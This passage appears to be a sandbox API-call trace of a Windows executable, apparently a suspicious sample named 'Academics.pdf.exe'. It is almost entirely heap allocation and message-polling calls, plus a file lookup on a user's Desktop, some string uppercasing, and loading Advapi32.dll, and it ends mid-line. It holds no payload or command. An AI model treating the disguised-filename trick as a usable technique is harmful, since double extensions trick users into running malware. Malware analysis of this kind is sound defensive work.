[0161.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0161.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0161.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0161.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.575] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.575] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0161.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0161.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0161.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0161.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.576] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0161.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0161.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0161.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0161.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0161.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0161.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0161.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0161.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0161.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0161.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.580] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0161.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0161.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.581] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0161.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0161.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0161.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Academics.pdf.exe", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb284da00, ftCreationTime.dwHighDateTime=0x1d509d6, ftLastAccessTime.dwLowDateTime=0xb31d7080, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xe73f6400, ftLastWriteTime.dwHighDateTime=0x1d509cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfd0d, dwReserved0=0x9a70006, dwReserved1=0xd578, cFileName="Academics.pdf.exe", cAlternateFileName="ACADEM~1.EXE")) returned 0xaa55e0 [0161.583] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.583] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0161.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0161.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.587] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0161.587] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.588] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.588] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.588] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.588] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.588] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.589] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.589] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.589] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.589] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.590] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.591] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: 